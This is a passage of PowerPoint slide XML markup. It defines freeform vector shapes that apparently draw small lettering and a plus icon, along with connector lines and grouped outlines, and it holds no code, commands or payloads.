                      <a:pt x="4" y="3"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="4"/>
                      <a:pt x="2" y="5"/>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166"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5792788" y="1130300"/>
                <a:ext cx="158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67"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5827713" y="1104900"/>
                <a:ext cx="22225" cy="42863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 11"/>
                  <a:gd name="T1" fmla="*/ 17 h 21"/>
                  <a:gd name="T2" fmla="*/ 1 w 11"/>
                  <a:gd name="T3" fmla="*/ 16 h 21"/>
                  <a:gd name="T4" fmla="*/ 5 w 11"/>
                  <a:gd name="T5" fmla="*/ 19 h 21"/>
                  <a:gd name="T6" fmla="*/ 7 w 11"/>
                  <a:gd name="T7" fmla="*/ 19 h 21"/>
                  <a:gd name="T8" fmla="*/ 8 w 11"/>
                  <a:gd name="T9" fmla="*/ 17 h 21"/>
                  <a:gd name="T10" fmla="*/ 9 w 11"/>
                  <a:gd name="T11" fmla="*/ 16 h 21"/>
                  <a:gd name="T12" fmla="*/ 8 w 11"/>
                  <a:gd name="T13" fmla="*/ 14 h 21"/>
                  <a:gd name="T14" fmla="*/ 5 w 11"/>
                  <a:gd name="T15" fmla="*/ 11 h 21"/>
                  <a:gd name="T16" fmla="*/ 2 w 11"/>
                  <a:gd name="T17" fmla="*/ 8 h 21"/>
                  <a:gd name="T18" fmla="*/ 1 w 11"/>
                  <a:gd name="T19" fmla="*/ 5 h 21"/>
                  <a:gd name="T20" fmla="*/ 1 w 11"/>
                  <a:gd name="T21" fmla="*/ 3 h 21"/>
                  <a:gd name="T22" fmla="*/ 3 w 11"/>
                  <a:gd name="T23" fmla="*/ 1 h 21"/>
                  <a:gd name="T24" fmla="*/ 6 w 11"/>
                  <a:gd name="T25" fmla="*/ 0 h 21"/>
                  <a:gd name="T26" fmla="*/ 8 w 11"/>
                  <a:gd name="T27" fmla="*/ 1 h 21"/>
                  <a:gd name="T28" fmla="*/ 11 w 11"/>
                  <a:gd name="T29" fmla="*/ 4 h 21"/>
                  <a:gd name="T30" fmla="*/ 9 w 11"/>
                  <a:gd name="T31" fmla="*/ 5 h 21"/>
                  <a:gd name="T32" fmla="*/ 7 w 11"/>
                  <a:gd name="T33" fmla="*/ 3 h 21"/>
                  <a:gd name="T34" fmla="*/ 6 w 11"/>
                  <a:gd name="T35" fmla="*/ 2 h 21"/>
                  <a:gd name="T36" fmla="*/ 4 w 11"/>
                  <a:gd name="T37" fmla="*/ 3 h 21"/>
                  <a:gd name="T38" fmla="*/ 3 w 11"/>
                  <a:gd name="T39" fmla="*/ 5 h 21"/>
                  <a:gd name="T40" fmla="*/ 3 w 11"/>
                  <a:gd name="T41" fmla="*/ 6 h 21"/>
                  <a:gd name="T42" fmla="*/ 4 w 11"/>
                  <a:gd name="T43" fmla="*/ 7 h 21"/>
                  <a:gd name="T44" fmla="*/ 7 w 11"/>
                  <a:gd name="T45" fmla="*/ 9 h 21"/>
                  <a:gd name="T46" fmla="*/ 10 w 11"/>
                  <a:gd name="T47" fmla="*/ 13 h 21"/>
                  <a:gd name="T48" fmla="*/ 11 w 11"/>
                  <a:gd name="T49" fmla="*/ 16 h 21"/>
                  <a:gd name="T50" fmla="*/ 9 w 11"/>
                  <a:gd name="T51" fmla="*/ 19 h 21"/>
                  <a:gd name="T52" fmla="*/ 5 w 11"/>
                  <a:gd name="T53" fmla="*/ 21 h 21"/>
                  <a:gd name="T54" fmla="*/ 2 w 11"/>
                  <a:gd name="T55" fmla="*/ 20 h 21"/>
                  <a:gd name="T56" fmla="*/ 0 w 11"/>
                  <a:gd name="T5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 h="21">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="16"/>
                      <a:pt x="1" y="16"/>
                      <a:pt x="1" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="18"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="5" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="7" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="8" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="7" y="12"/>
                      <a:pt x="5" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="9"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="7"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="4"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="1"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="7" y="1"/>
                      <a:pt x="8" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="5"/>
                      <a:pt x="9" y="5"/>
                      <a:pt x="9" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="4"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="7" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="3"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="6"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="6"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="4" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="8"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="11"/>
                      <a:pt x="9" y="12"/>
                      <a:pt x="10" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="15"/>
                      <a:pt x="11" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="10" y="18"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="7" y="21"/>
                      <a:pt x="5" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="21"/>
                      <a:pt x="3" y="21"/>
                      <a:pt x="2" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="19"/>
                      <a:pt x="0" y="18"/>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68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5857875" y="1108075"/>
                <a:ext cx="22225" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 3 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 24"/>
                  <a:gd name="T8" fmla="*/ 3 w 14"/>
                  <a:gd name="T9" fmla="*/ 10 h 24"/>
                  <a:gd name="T10" fmla="*/ 14 w 14"/>
                  <a:gd name="T11" fmla="*/ 10 h 24"/>
                  <a:gd name="T12" fmla="*/ 14 w 14"/>
                  <a:gd name="T13" fmla="*/ 12 h 24"/>
                  <a:gd name="T14" fmla="*/ 3 w 14"/>
                  <a:gd name="T15" fmla="*/ 12 h 24"/>
                  <a:gd name="T16" fmla="*/ 3 w 14"/>
                  <a:gd name="T17" fmla="*/ 22 h 24"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 22 h 24"/>
                  <a:gd name="T20" fmla="*/ 14 w 14"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 14"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 14"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5889625" y="1108075"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 4 w 12"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 8 w 12"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 11 w 12"/>
                  <a:gd name="T7" fmla="*/ 2 h 19"/>
                  <a:gd name="T8" fmla="*/ 12 w 12"/>
                  <a:gd name="T9" fmla="*/ 5 h 19"/>
                  <a:gd name="T10" fmla="*/ 11 w 12"/>
                  <a:gd name="T11" fmla="*/ 8 h 19"/>
                  <a:gd name="T12" fmla="*/ 8 w 12"/>
                  <a:gd name="T13" fmla="*/ 10 h 19"/>
                  <a:gd name="T14" fmla="*/ 3 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 19"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 10 h 19"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 0 w 12"/>
                  <a:gd name="T21" fmla="*/ 19 h 19"/>
                  <a:gd name="T22" fmla="*/ 0 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 19"/>
                  <a:gd name="T24" fmla="*/ 2 w 12"/>
                  <a:gd name="T25" fmla="*/ 2 h 19"/>
                  <a:gd name="T26" fmla="*/ 2 w 12"/>
                  <a:gd name="T27" fmla="*/ 8 h 19"/>
                  <a:gd name="T28" fmla="*/ 5 w 12"/>
                  <a:gd name="T29" fmla="*/ 8 h 19"/>
                  <a:gd name="T30" fmla="*/ 8 w 12"/>
                  <a:gd name="T31" fmla="*/ 8 h 19"/>
                  <a:gd name="T32" fmla="*/ 9 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 19"/>
                  <a:gd name="T34" fmla="*/ 10 w 12"/>
                  <a:gd name="T35" fmla="*/ 5 h 19"/>
                  <a:gd name="T36" fmla="*/ 9 w 12"/>
                  <a:gd name="T37" fmla="*/ 3 h 19"/>
                  <a:gd name="T38" fmla="*/ 8 w 12"/>
                  <a:gd name="T39" fmla="*/ 2 h 19"/>
                  <a:gd name="T40" fmla="*/ 5 w 12"/>
                  <a:gd name="T41" fmla="*/ 2 h 19"/>
                  <a:gd name="T42" fmla="*/ 2 w 12"/>
                  <a:gd name="T43"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19">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="1"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="3"/>
                      <a:pt x="12" y="4"/>
                      <a:pt x="12" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="6"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="11" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="9"/>
                      <a:pt x="9" y="10"/>
                      <a:pt x="8" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="10"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="3" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="8"/>
                      <a:pt x="8" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="9" y="7"/>
                      <a:pt x="9" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="9" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="5" y="2"/>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
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5940425" y="1108075"/>
                <a:ext cx="9525" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 6"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 6 w 6"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 4 w 6"/>
                  <a:gd name="T7" fmla="*/ 24 h 24"/>
                  <a:gd name="T8" fmla="*/ 4 w 6"/>
                  <a:gd name="T9" fmla="*/ 2 h 24"/>
                  <a:gd name="T10" fmla="*/ 0 w 6"/>
                  <a:gd name="T11" fmla="*/ 2 h 24"/>
                  <a:gd name="T12" fmla="*/ 1 w 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 h="24">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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1"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5967413" y="1108075"/>
                <a:ext cx="25400" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 16 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 2 w 16"/>
                  <a:gd name="T5" fmla="*/ 25 h 25"/>
                  <a:gd name="T6" fmla="*/ 1 w 16"/>
                  <a:gd name="T7" fmla="*/ 24 h 25"/>
                  <a:gd name="T8" fmla="*/ 13 w 16"/>
                  <a:gd name="T9" fmla="*/ 2 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 2 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>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16" h="25">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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03" name="Straight Connector 102"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296025" y="1660089"/>
            <a:ext cx="2009775" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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nvGrpSpPr>
          <p:cNvPr id="104" name="Group 103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8315325" y="3713163"/>
            <a:ext cx="3103563" cy="1624013"/>
            <a:chOff x="8315325" y="3713163"/>
            <a:chExt cx="3103563" cy="1624013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Freeform 175"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8380413" y="3725863"/>
              <a:ext cx="3038475" cy="1611313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 326 w 1914"/>
                <a:gd name="T1" fmla="*/ 0 h 1015"/>
                <a:gd name="T2" fmla="*/ 1914 w 1914"/>
                <a:gd name="T3" fmla="*/ 0 h 1015"/>
                <a:gd name="T4" fmla="*/ 1914 w 1914"/>
                <a:gd name="T5" fmla="*/ 563 h 1015"/>
                <a:gd name="T6" fmla="*/ 1456 w 1914"/>
                <a:gd name="T7" fmla="*/ 1015 h 1015"/>
                <a:gd name="T8" fmla="*/ 0 w 1914"/>
                <a:gd name="T9" fmla="*/ 1015 h 1015"/>
                <a:gd name="T10" fmla="*/ 0 w 1914"/>
                <a:gd name="T11" fmla="*/ 307 h 1015"/>
                <a:gd name="T12" fmla="*/ 326 w 1914"/>
                <a:gd name="T13" fmla="*/ 0 h 1015"/>
                <a:gd name="T14" fmla="*/ 326 w 1914"/>
                <a:gd name="T15" fmla="*/ 0 h 1015"/>
                <a:gd name="T16" fmla="*/ 0 w 1914"/>
                <a:gd name="T17" fmla="*/ 307 h 1015"/>
                <a:gd name="T18" fmla="*/ 0 w 1914"/>
                <a:gd name="T19" fmla="*/ 307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4" h="1015">
                  <a:moveTo>
                    <a:pt x="326" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1914" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456" y="1015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="307"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="326" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="326" y="0"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="0" y="307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="307"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="50196"/>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06" name="Group 105"/>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8315325" y="3713163"/>
              <a:ext cx="2506663" cy="1379538"/>
              <a:chOff x="8315325" y="3713163"/>
              <a:chExt cx="2506663" cy="1379538"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="50196"/>
              </a:schemeClr>
            </a:solidFill>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="107" name="Group 106"/>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8315325" y="3713163"/>
                <a:ext cx="2506663" cy="1379538"/>
                <a:chOff x="8315325" y="3713163"/>
                <a:chExt cx="2506663" cy="1379538"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="110" name="Freeform 176"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8315325" y="3713163"/>
                  <a:ext cx="141288" cy="139700"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 53 w 61"/>
                    <a:gd name="T1" fmla="*/ 23 h 61"/>
                    <a:gd name="T2" fmla="*/ 38 w 61"/>
                    <a:gd name="T3" fmla="*/ 23 h 61"/>
                    <a:gd name="T4" fmla="*/ 38 w 61"/>
                    <a:gd name="T5" fmla="*/ 7 h 61"/>
                    <a:gd name="T6" fmla="*/ 30 w 61"/>
                    <a:gd name="T7" fmla="*/ 0 h 61"/>
                    <a:gd name="T8" fmla="*/ 23 w 61"/>
                    <a:gd name="T9" fmla="*/ 7 h 61"/>
                    <a:gd name="T10" fmla="*/ 23 w 61"/>
                    <a:gd name="T11" fmla="*/ 23 h 61"/>
                    <a:gd name="T12" fmla="*/ 8 w 61"/>
                    <a:gd name="T13" fmla="*/ 23 h 61"/>
                    <a:gd name="T14" fmla="*/ 0 w 61"/>
                    <a:gd name="T15" fmla="*/ 30 h 61"/>
                    <a:gd name="T16" fmla="*/ 8 w 61"/>
                    <a:gd name="T17" fmla="*/ 38 h 61"/>
                    <a:gd name="T18" fmla="*/ 23 w 61"/>
                    <a:gd name="T19" fmla="*/ 38 h 61"/>
                    <a:gd name="T20" fmla="*/ 23 w 61"/>
                    <a:gd name="T21" fmla="*/ 53 h 61"/>
                    <a:gd name="T22" fmla="*/ 30 w 61"/>
                    <a:gd name="T23" fmla="*/ 61 h 61"/>
                    <a:gd name="T24" fmla="*/ 38 w 61"/>
                    <a:gd name="T25" fmla="*/ 53 h 61"/>
                    <a:gd name="T26" fmla="*/ 38 w 61"/>
                    <a:gd name="T27" fmla="*/ 38 h 61"/>
                    <a:gd name="T28" fmla="*/ 53 w 61"/>
                    <a:gd name="T29" fmla="*/ 38 h 61"/>
                    <a:gd name="T30" fmla="*/ 61 w 61"/>
                    <a:gd name="T31" fmla="*/ 30 h 61"/>
                    <a:gd name="T32" fmla="*/ 53 w 61"/>
                    <a:gd name="T33"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61">
                      <a:moveTo>
                        <a:pt x="53" y="23"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="23"/>
                        <a:pt x="38" y="23"/>
                        <a:pt x="38" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="7"/>
                        <a:pt x="38" y="7"/>
                        <a:pt x="38" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="3"/>
                        <a:pt x="35" y="0"/>
                        <a:pt x="30" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="0"/>
                        <a:pt x="23" y="3"/>
                        <a:pt x="23" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="23"/>
                        <a:pt x="23" y="23"/>
                        <a:pt x="23" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="23"/>
                        <a:pt x="8" y="23"/>
                        <a:pt x="8" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="23"/>
                        <a:pt x="0" y="26"/>
                        <a:pt x="0" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="34"/>
                        <a:pt x="3" y="38"/>
                        <a:pt x="8" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="38"/>
                        <a:pt x="23" y="38"/>
                        <a:pt x="23" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="53"/>
                        <a:pt x="23" y="53"/>
                        <a:pt x="23" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="57"/>
                        <a:pt x="26" y="61"/>
                        <a:pt x="30" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="61"/>
                        <a:pt x="38" y="57"/>
                        <a:pt x="38" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="38"/>
                        <a:pt x="38" y="38"/>
                        <a:pt x="38" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="38"/>
                        <a:pt x="53" y="38"/>
                        <a:pt x="53" y="38"/>
                      </a:cubicBezTo>
